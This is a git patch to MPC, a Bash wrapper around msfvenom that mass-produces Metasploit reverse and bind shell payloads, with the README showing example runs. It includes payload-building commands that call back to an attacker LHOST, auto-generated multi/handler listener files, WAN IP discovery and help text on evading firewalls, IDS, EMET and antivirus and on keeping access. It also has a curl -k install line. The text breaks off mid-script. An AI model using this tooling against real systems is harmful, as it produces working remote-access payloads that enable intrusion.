From 007db2720fbddd9b34dbfdfc91aa52a6d5c9b432 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Mon, 20 Jul 2015 17:00:36 +0100 Subject: [PATCH] v1.3 WAN + Bind/Reverse + tcp/http/https/find_port + Add direction: Bind / Reverse + Add method: tcp / http / https/ find_port (& allports) + Add verbose to help screen (with URLs) + Detect & use external/WAN IP address + Display any errors from Metasploit/msfvenom when creating + File stats (md5/sha1/size) when using verbose + Output names include port & direction + Rather than limiting what payloads can be create - always create + This way when Metasploit is updated, the script isn't dated. + Redirect rather than using `-o` (for legacy metasploit versions - Fix for #1) --- README.md | 137 +++++++----- mpc.sh | 643 +++++++++++++++++++++++++++++++++--------------------- 2 files changed, 478 insertions(+), 302 deletions(-) diff --git a/README.md b/README.md index 20cba46..eb8de34 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework). -![Msfvenom Payload Creator (MPC)](https://i.imgur.com/0q41eqR.png) +![Msfvenom Payload Creator (MPC)](https://i.imgur.com/JwSYBRZ.png) - - - 
@@ -9,15 +9,20 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (p Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload. **Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MPC itself)_. -The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands** and a **quick web server** etc). +The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands**, **batch payload production** and able to enter **any argument in any order** _(in various formats/patterns)_). The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`). +* Can't remember your IP for a interface? Don't sweat it, just use the interface name: `eth0`. +* Don't know what your external IP is? MPC will discover it: `wan`. +* Want to generate one of each payload? No issue! Try: `loop`. +* Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)! + _Note: This will **not** try to bypass any anti-virus solutions._ ## Install -* Designed for **Kali Linux 1.1.0a+** & **Metasploit v4.11+** _(nothing else has been tested)_. +* Designed for **Kali Linux v1.1.0a+** & **Metasploit v4.11+** _(nothing else has been tested)_. ``` curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc 
@@ -28,17 +33,18 @@ mpc ## Help ``` bash -root@kali:~# mpc - [*] Msfvenom Payload Creator (MPC v1.2) +root@kali:~# mpc -h -v + [*] Msfvenom Payload Creator (MPC v1.3) - [i] /usr/bin/mpc () () () () () () + [i] /usr/bin/mpc () () () () () () () () [i] Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP. [i] /usr/bin/mpc elf eth0 4444 # Linux, eth0's IP & manual port. [i] /usr/bin/mpc stageless cmd py verbose # Python, stageless command prompt. [i] /usr/bin/mpc loop eth1 # A payload for every type, using eth1's IP. - [i] /usr/bin/mpc msf batch eth1 # All possible Meterpreter payloads, using eth1's IP. + [i] /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP. + [i] /usr/bin/mpc help verbose # This help screen, with even more information. - [i] : (All reverse TCP payloads) + [i] : [i] + ASP [i] + ASPX [i] + Bash [.sh] 
@@ -57,20 +63,40 @@ root@kali:~# mpc [i] Missing will default to 443. - [i] splits the payload into parts, making it smaller but dependant on Metasploit. - [i] is the complete standalone payload. More 'stabe' than . - [i] Missing will default to . - [i] Note: Metasploit doesn't (yet!) support for every format. - [i] is a standard/native command prompt/terminal to interactive with. [i] is a custom cross platform Meterpreter shell, gaining the full power of Metasploit. - [i] Note: Metasploit doesn't (yet!) support / for every format. - [i] Missing will default to Meterpreter. - - [i] will generate as many combinations as possible: , & . + [i] Missing will default to where possible. + [i] Note: Metasploit doesn't (yet!) support for every format. + [i] payloads are generally smaller than and easier to bypass EMET. Limit Metasploit post modules/scripts support. + [i] payloads are generally much larger than , as it comes with more features. + + [i] opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target. + [i] makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target. + [i] Missing will default to . + [i] allows for the attacker to connect whenever they wish. needs to the target to be repeatedly connecting back to permanent maintain access. + + [i] splits the payload into parts, making it smaller but dependent on Metasploit. + [i] is the complete standalone payload. More 'stable' than . + [i] Missing will default to where possible. + [i] Note: Metasploit doesn't (yet!) support for every format. + [i] are 'better' in low-bandwidth/high-latency environments. + [i] are seen as 'stealthier' when bypassing Anti-Virus protections. may work 'better' with IDS/IPS. 
+ [i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads + [i] https://www.offensive-security.com/metasploit-unleashed/payload-types/ + [i] https://www.offensive-security.com/metasploit-unleashed/payloads/ + + [i] is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs. + [i] makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80. + [i] makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443. + [i] will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on . + [i] Missing will default to . + [i] By altering the traffic, such as and even more , it will slow down the communication & increase the payload size. + [i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication + + [i] will generate as many combinations as possible: , , , & [i] will just create one of each . - [i] will display more information during the process. + [i] will display more information. root@kali:~# ``` 
@@ -78,13 +104,14 @@ root@kali:~# ```bash root@kali:~# mpc windows 192.168.1.10 - [*] Msfvenom Payload Creator (MPC v1.2) - [i] IP: 192.168.1.10 - [i] PORT: 443 - [i] TYPE: windows (windows/meterpreter_reverse_tcp) - [i] CMD: msfvenom -p windows/meterpreter_reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 -o /root/windows-stageless-meterpreter-443.exe - [i] windows meterpreter created: '/root/windows-stageless-meterpreter-443.exe' - [i] MSF handler file: '/root/windows-stageless-meterpreter-443-exe.rc' (msfconsole -q -r /root/windows-stageless-meterpreter-443-exe.rc) + [*] Msfvenom Payload Creator (MPC v1.3) + [i] IP: 192.168.1.10 + [i] PORT: 443 + [i] TYPE: windows (windows/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe + [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting... + [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe' + [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc) [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# 
@@ -94,13 +121,13 @@ root@kali:~# ```bash root@kali:~# ./mpc elf eth0 4444 - [*] Msfvenom Payload Creator (MPC v1.2) - [i] IP: 192.168.103.240 - [i] PORT: 4444 - [i] TYPE: linux (linux/x86/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.240 LPORT=4444 -o /root/linux-staged-meterpreter-4444.elf - [i] linux meterpreter created: '/root/linux-staged-meterpreter-4444.elf' - [i] MSF handler file: '/root/linux-staged-meterpreter-4444-elf.rc' (msfconsole -q -r /root/linux-staged-meterpreter-4444-elf.rc) + [*] Msfvenom Payload Creator (MPC v1.3) + [i] IP: 192.168.103.238 + [i] PORT: 4444 + [i] TYPE: linux (linux/x86/shell/reverse_tcp) + [i] CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf + [i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf' + [i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc' (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc) [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# 
@@ -109,36 +136,44 @@ root@kali:~# ## Example \#3 (Python Format, Stageless Command Prompt Using Interactive IP Menu) ```bash -root@kali:~# bash mpc.sh stageless cmd py verbose - [*] Msfvenom Payload Creator (MPC v1.2) +root@kali:~# mpc stageless cmd py verbose + [*] Msfvenom Payload Creator (MPC v1.3) [i] Use which interface/IP address?: - [i] 1.) eth0 - 192.168.103.240 + [i] 1.) eth0 - 192.168.103.238 [i] 2.) eth1 - 192.168.155.175 - [i] 3.) lo - 127.0.0.1 - [?] Select 1-3, interface or IP address: 2 - - [i] IP: 192.168.155.175 - [i] PORT: 443 - [i] TYPE: python (python/shell_reverse_tcp) - [i] STAGE: stageless - [i] SHELL: shell - [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.155.175 LPORT=443 -o /root/python-stageless-shell-443.py - [i] python shell created: '/root/python-stageless-shell-443.py' - [i] MSF handler file: '/root/python-stageless-shell-443-py.rc' (msfconsole -q -r /root/python-stageless-shell-443-py.rc) + [i] 3.) tap0 - 10.10.100.63 + [i] 4.) lo - 127.0.0.1 + [i] 5.) wan - xx.xx.xx.xx + [?] Select 1-5, interface or IP address: 3 + + [i] IP: 10.10.100.63 + [i] PORT: 443 + [i] TYPE: python (python/shell_reverse_tcp) + [i] SHELL: shell + [i] DIRECTION: reverse + [i] STAGE: stageless + [i] METHOD: tcp + [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py + [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py' + [i] File: ASCII text, with very long lines, with no line terminators + [i] Size: 4.0K + [i] MD5: 53452eafafe21bff94e6c4621525165b + [i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9 + [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc' (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc) [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! 
root@kali:~# ``` +_Note: Removed WAN IP._ -![Examples](https://i.imgur.com/m4lG23l.png) +![Examples](https://i.imgur.com/r9Qmzda.png) - - - ## To-Do List -* Display file stats (e.g. file, size, md5/sha1) _Commands are in, just commented out._ -* Support different payloads (e.g. `reverse_http`/`reverse_https`, `bind`, `find_port` etc) +* Shellcode generation * x64 payloads -* external IP/WAN -* _...IPv6 support?_ +* IPv6 support +* Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_ \ No newline at end of file diff --git a/mpc.sh b/mpc.sh index c2b4572..95ec859 100755 --- a/mpc.sh +++ b/mpc.sh @@ -1,6 +1,6 @@ #!/bin/bash #-Metadata----------------------------------------------------# -# Filename: mpc.sh (v1.2) (Update: 2015-07-01) # +# Filename: mpc.sh (v1.3) (Update: 2015-07-20) # #-Info--------------------------------------------------------# # Quickly generate Metasploit payloads using msfvenom. # #-Author(s)---------------------------------------------------# @@ -12,15 +12,19 @@ #-Notes-------------------------------------------------------# # Requires: # # Metasploit Framework v4.11.3-2015062101 or higher # -# Will not auto update when there are more payloads added # # --- # -# Commands: # +# Older Metasploit/msfvenom do not have '-o', so '>' instead # +# --- # +# Useful Manual Commands: # # msfvenom --list payloads # +# msfvenom --list encoders # # msfvenom --help-formats # # --- # # Payload names: # # shell_bind_tcp - Single / Inline / NonStaged / Stageless # # shell/bind_tcp - Staged (Requires Metasploit)   # +#--Quick Install----------------------------------------------# +# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc; chmod +x /usr/bin/mpc #-More information--------------------------------------------# # - https://www.offensive-security.com/metasploit-unleashed/payloads/ # - https://www.offensive-security.com/metasploit-unleashed/payload-types/ 
@@ -29,9 +33,6 @@ # - https://community.rapid7.com/community/metasploit/blog/2011/05/24/introducing-msfvenom # - https://community.rapid7.com/community/metasploit/blog/2014/12/09/good-bye-msfpayload-and-msfencode # - https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom -#--Install----------------------------------------------------# -# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc -# chmod +x /usr/bin/mpc #-------------------------------------------------------------# @@ -39,28 +40,32 @@ ##### Variables -OUTPATH="$(pwd)/" # ./ /var/www/ /tmp/ +OUTPATH="$(pwd)/" # Others: ./ /tmp/ /var/www/ ##### (Cosmetic) Colour output RED="\033[01;31m" # Issues/Errors GREEN="\033[01;32m" # Success/Asking for Input YELLOW="\033[01;33m" # Warnings/Information BLUE="\033[01;34m" # Heading +BOLD="\033[01;01m" # Highlight RESET="\033[00m" # Normal ##### Read command line arguments -TYPE="" #"$(echo ${1} | \tr '[:upper:]' '[:lower:]')" -IP="" #"${2}" -PORT="" #"${3}" -STAGE="" # staged // stageless -SHELL="" # shell // meterpreters +TYPE="" #"$(echo ${1} | \tr '[:upper:]' '[:lower:]')" Defalut: *REQUIRED* +IP="" #"${2}" Defalut: *IP menu* +PORT="" #"${3}" Deafult: 443 +SHELL="" # shell // meterpreter Default: meterpreter +DIRECTION="" # reverse // bind Default: reverse +STAGE="" # staged // stageless Default: stageless +METHOD="" # tcp // http // https // find_port Default: tcp VERBOSE=false ##### Default values -SUCCESS=false -DOMAIN=false -BATCH=false -LOOP=false +SUCCESS=false # Did we successfully create a payload? +DOMAIN=false # IP address or domain name? +BATCH=false # Are we creating multiple payloads (one of each type) ? +LOOP=false # Are we creating multiple payloads (every possible combination)? +HELP=false # Display the help screen? ##### (Optional) Enable debug mode? #set -x 
@@ -68,7 +73,7 @@ LOOP=false #-Function-------------------------------------------------------------# -## doAction TYPE IP PORT PAYLOAD CMD FILEEXT SHELL STAGE VERBOSE +## doAction TYPE IP PORT PAYLOAD CMD FILEEXT SHELL DIRECTION STAGE METHOD VERBOSE function doAction { TYPE="${1}" IP="${2}" 
@@ -77,53 +82,67 @@ function doAction { CMD="${5}" FILEEXT="${6}" SHELL="${7}" - STAGE="${8}" - VERBOSE="${9}" + DIRECTION="${8}" + STAGE="${9}" + METHOD="${10}" + VERBOSE="${11}" if [[ -z "${VERBOSE}" ]]; then - echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally)${RESET}: doAction TYPE(${TYPE}) IP(${IP}) PORT(${PORT}) PAYLOAD(${PAYLOAD}) CMD(${CMD}) FILEEXT(${FILEEXT}) SHELL(${SHELL}) STAGE(${STAGE}) VERBOSE(${VERBOSE})" >&2 + echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally)${RESET}: doAction TYPE(${TYPE}) IP(${IP}) PORT(${PORT}) PAYLOAD(${PAYLOAD}) CMD(${CMD}) FILEEXT(${FILEEXT}) SHELL(${SHELL}) DIRECTION(${DIRECTION}) STAGE(${STAGE}) METHOD(${METHOD}) VERBOSE(${VERBOSE})" >&2 exit 2 fi - if [[ "${STAGE}" == 'true' ]]; then _STAGE='-staged' - else _STAGE=''; fi - - FILENAME="${OUTPATH}$(echo ${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT} | \tr '[:upper:]' '[:lower:]')" - FILEHANDLE="${OUTPATH}$(echo ${TYPE}-${STAGE}-${SHELL}-${PORT}-${FILEEXT}.rc | \tr '[:upper:]' '[:lower:]')" + FILENAME="${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + FILEHANDLE="${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}-${FILEEXT}.rc" X=" IP" - [[ "${DOMAIN}" == "true" ]] && X='NAME' - - echo -e " ${YELLOW}[i]${RESET} ${X}: ${YELLOW}${IP}${RESET}" - echo -e " ${YELLOW}[i]${RESET} PORT: ${YELLOW}${PORT}${RESET}" - echo -e " ${YELLOW}[i]${RESET} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})" - [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} STAGE: ${YELLOW}${STAGE}${RESET}" - [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} SHELL: ${YELLOW}${SHELL}${RESET}" - echo -e " ${YELLOW}[i]${RESET} CMD: ${YELLOW}${CMD}${RESET}" + [[ "${DOMAIN}" == "true" ]] && X='NAME' + [[ "${VERBOSE}" == "true" ]] && PADDING=' ' + + echo -e " ${YELLOW}[i]${RESET}${PADDING} ${X}: ${YELLOW}${IP}${RESET}" + echo -e " ${YELLOW}[i]${RESET}${PADDING} PORT: ${YELLOW}${PORT}${RESET}" + echo -e " 
${YELLOW}[i]${RESET}${PADDING} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} SHELL: ${YELLOW}${SHELL}${RESET}" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} DIRECTION: ${YELLOW}${DIRECTION}${RESET}" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} STAGE: ${YELLOW}${STAGE}${RESET}" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} METHOD: ${YELLOW}${METHOD}${RESET}" + echo -e " ${YELLOW}[i]${RESET}${PADDING} CMD: ${BOLD}${CMD}${RESET}" [[ -e "${FILENAME}" ]] && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. Overwriting..." && rm -f "${FILENAME}" - eval "${CMD}" 2>/dev/null + eval "${CMD}" 2>/tmp/mpc.out + [[ ! -s "${FILENAME}" ]] && rm -f "${FILENAME}" if [[ -e "${FILENAME}" ]]; then echo -e " ${YELLOW}[i]${RESET} ${TYPE} ${SHELL} created: '${YELLOW}${FILENAME}${RESET}'" + \chmod +x "${FILENAME}" else - echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET}. =(" >&2 + echo "" + \grep -q 'Invalid Payload Selected' /tmp/mpc.out 2>/dev/null + if [[ "$?" == '0' ]]; then + echo -e " ${YELLOW}[i]${RESET} ${RED}Invalid Payload Selected${RESET} (Metasploit doesn't support this) =(" >&2 + \rm -f /tmp/mpc.out + else + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET} =(." 
>&2 + echo -e "\n----------------------------------------------------------------------------------------${RED}" + \cat /tmp/mpc.out + echo -e "${RESET}----------------------------------------------------------------------------------------\n" + fi exit 2 fi + \rm -f /tmp/mpc.out - #echo -e " ${YELLOW}[i]${RESET} File: $(\file -b ${FILENAME})" - #echo -e " ${YELLOW}[i]${RESET} Size: $(\du -h ${FILENAME} | \cut -f1)" - #echo -e " ${YELLOW}[i]${RESET} MD5: $(\openssl md5 ${FILENAME} | \awk '{print $2}')" - #echo -e " ${YELLOW}[i]${RESET} SHA1: $(\openssl sha1 ${FILENAME} | \awk '{print $2}')" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} File: $(\file -b ${FILENAME})" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Size: $(\du -h ${FILENAME} | \cut -f1)" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} MD5: $(\openssl md5 ${FILENAME} | \awk '{print $2}')" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} SHA1: $(\openssl sha1 ${FILENAME} | \awk '{print $2}')" cat < "${FILEHANDLE}" # -# RUN: service postgresql start; service metasploit start; msfconsole -q -r "${FILENAME}" +# RUN: service postgresql start;service metasploit start; msfconsole -q -r "${FILENAME}" # use exploit/multi/handler set PAYLOAD ${PAYLOAD} set LHOST ${IP} set LPORT ${PORT} -#set AutoRunScript "migrate -f -k" post/windows/manage/smart_migrate set ExitOnSession false run -j EOF 
@@ -132,25 +151,103 @@ EOF return } +## doAction +function doHelp { + echo -e "\n ${YELLOW}[i]${RESET} ${BLUE}${0}${RESET} () () () () () () () ()" + echo -e " ${YELLOW}[i]${RESET} Example: ${0} windows 192.168.1.10 # Windows & manual IP." + echo -e " ${YELLOW}[i]${RESET} ${0} elf eth0 4444 # Linux, eth0's IP & manual port." + echo -e " ${YELLOW}[i]${RESET} ${0} stageless cmd py verbose # Python, stageless command prompt." + echo -e " ${YELLOW}[i]${RESET} ${0} loop eth1 # A payload for every type, using eth1's IP." + echo -e " ${YELLOW}[i]${RESET} ${0} msf batch wan # All possible Meterpreter payloads, using WAN IP." + echo -e " ${YELLOW}[i]${RESET} ${0} help verbose # This help screen, with even more information." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}TYPE${RESET}>:" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASP${RESET}" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASPX${RESET}" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Bash${RESET} [.${YELLOW}sh${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Java${RESET} [.${YELLOW}jsp${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Linux${RESET} [.${YELLOW}elf${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}OSX${RESET} [.${YELLOW}macho${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Perl${RESET} [.${YELLOW}pl${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}PHP${RESET}" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Powershell${RESET} [.${YELLOW}ps1${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Python${RESET} [.${YELLOW}py${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET}]" + echo "" + echo -e " ${YELLOW}[i]${RESET} Rather than putting <${BOLD}DOMAIN/IP${RESET}>, you can do a ${YELLOW}interface${RESET} and MPC will detect that IP address." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}DOMAIN/IP${RESET}> will default to the ${YELLOW}IP menu${RESET}." 
+ echo "" + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}PORT${RESET}> will default to ${YELLOW}443${RESET}." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}CMD${RESET}> is a standard/${YELLOW}native command prompt${RESET}/terminal to interactive with." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}MSF${RESET}> is a custom ${YELLOW}cross platform Meterpreter${RESET} shell, gaining the full power of Metasploit." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}CMD/MSF${RESET}> will default to ${YELLOW}${RESET} where possible." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Note: Metasploit doesn't (yet!) support <${BOLD}CMD/MSF${RESET}> for every <${BOLD}TYPE${RESET}> format." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} <${BOLD}CMD${RESET}> payloads are generally ${YELLOW}smaller${RESET} than <${BOLD}MSF${RESET}> and easier to bypass EMET. Limit Metasploit post modules/scripts support." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} <${BOLD}MSF${RESET}> payloads are generally much ${YELLOW}larger${RESET} than <${BOLD}CMD${RESET}>, as it comes with ${YELLOW}more features${RESET}." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}BIND${RESET}> ${YELLOW}opens a port on the target side${RESET}, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}REVERSE${RESET}> makes ${YELLOW}the target connect back to the attacker${RESET}. The attacker needs an open port. Blocked with engress firewalls rules on the target." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}BIND/REVERSE${RESET}> will default to ${YELLOW}${RESET}." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} <${BOLD}BIND${RESET}> allows for the ${YELLOW}attacker to connect whenever they wish${RESET}. <${BOLD}REVERSE${RESET}> needs to the target to be repeatedly connecting back to ${YELLOW}permanent maintain access${RESET}." 
+ echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}STAGED${RESET}> splits the payload into parts, making it ${YELLOW}smaller but dependent on Metasploit${RESET}." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}STAGELESS${RESET}> is the complete ${YELLOW}standalone payload${RESET}. More 'stable' than <${BOLD}STAGED${RESET}>." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}STAGED/STAGELESS${RESET}> will default to ${YELLOW}${RESET} where possible." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Note: Metasploit doesn't (yet!) support <${BOLD}STAGED/STAGELESS${RESET}> for every <${BOLD}TYPE${RESET}> format." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} are 'better' in ${YELLOW}low-bandwidth/high-latency${RESET} environments." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} are seen as 'stealthier' when bypassing Anti-Virus protections. <${BOLD}STAGED${RESET}> may work 'better' with IDS/IPS." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} ${YELLOW}More information${RESET}: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} https://www.offensive-security.com/metasploit-unleashed/payload-types/" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} https://www.offensive-security.com/metasploit-unleashed/payloads/" + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}TCP${RESET}> is the standard method to connecting back. This is the ${YELLOW}most compatible with TYPES as its RAW${RESET}. Can be easily detected on IDSs." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}HTTP${RESET}> makes the ${YELLOW}communication appear to be HTTP traffic${RESET} (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}HTTPS${RESET}> makes the ${YELLOW}communication appear to be (encrypted) HTTP traffic${RESET} using as SSL. 
Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}FIND_PORT${RESET}> will ${YELLOW}attempt every port on the target machine, to find a way out${RESET}. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <${BOLD}TYPE${RESET}>." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}TCP/HTTP/HTTPS/FIND_PORT${RESET}> will default to ${YELLOW}${RESET}." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} By altering the traffic, such as <${BOLD}HTTP${RESET}> and even more ${BOLD}, it ${YELLOW}will slow down the communication & increase the payload size${RESET}." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} ${YELLOW}More information${RESET}: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication" + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}BATCH${RESET}> will generate ${YELLOW}as many combinations as possible${RESET}: <${BOLD}TYPE${RESET}>, <${BOLD}CMD + MSF${RESET}>, <${BOLD}BIND + REVERSE${RESET}>, <${BOLD}STAGED + STAGLESS${RESET}> & <${BOLD}TCP + HTTP + HTTPS + FIND_PORT${RESET}> " + echo -e " ${YELLOW}[i]${RESET} <${BOLD}LOOP${RESET}> will just create ${YELLOW}one of each${RESET} <${BOLD}TYPE${RESET}>." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}VERBOSE${RESET}> will display ${YELLOW}more information${RESET}." + exit 1 +} + #-Start----------------------------------------------------------------# ## Banner -echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET} v${BLUE}1.2${RESET})" +echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET} v${BLUE}1.3${RESET})" ## Check system +## Are we using Linux? (Sorry OSX users) +if [[ "$(\uname)" != "Linux" ]]; then + echo -e " ${YELLOW}[i]${RESET} Something went wrong. 
